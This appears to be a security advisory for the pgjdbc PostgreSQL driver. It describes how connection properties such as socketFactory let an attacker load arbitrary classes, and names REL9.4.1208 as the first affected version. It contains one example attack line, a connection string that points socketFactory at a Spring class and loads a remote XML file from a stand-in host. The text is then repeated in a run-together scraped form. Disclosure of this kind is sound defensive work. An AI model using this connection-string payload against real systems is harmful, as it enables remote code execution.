Impact
pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties.
However, the driver did not verify if the class implements the expected interface before instantiating the class.
Here's an example attack using an out-of-the-box class from Spring Framework:
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");
The first impacted version is REL9.4.1208 (it introduced socketFactory connection property)
Impact
pgjdbc instantiates plugin instances based on class names provided via
authenticationPluginClassName,sslhostnameverifier,socketFactory,sslfactory,sslpasswordcallbackconnection properties.However, the driver did not verify if the class implements the expected interface before instantiating the class.
Here's an example attack using an out-of-the-box class from Spring Framework:
The first impacted version is REL9.4.1208 (it introduced
socketFactoryconnection property)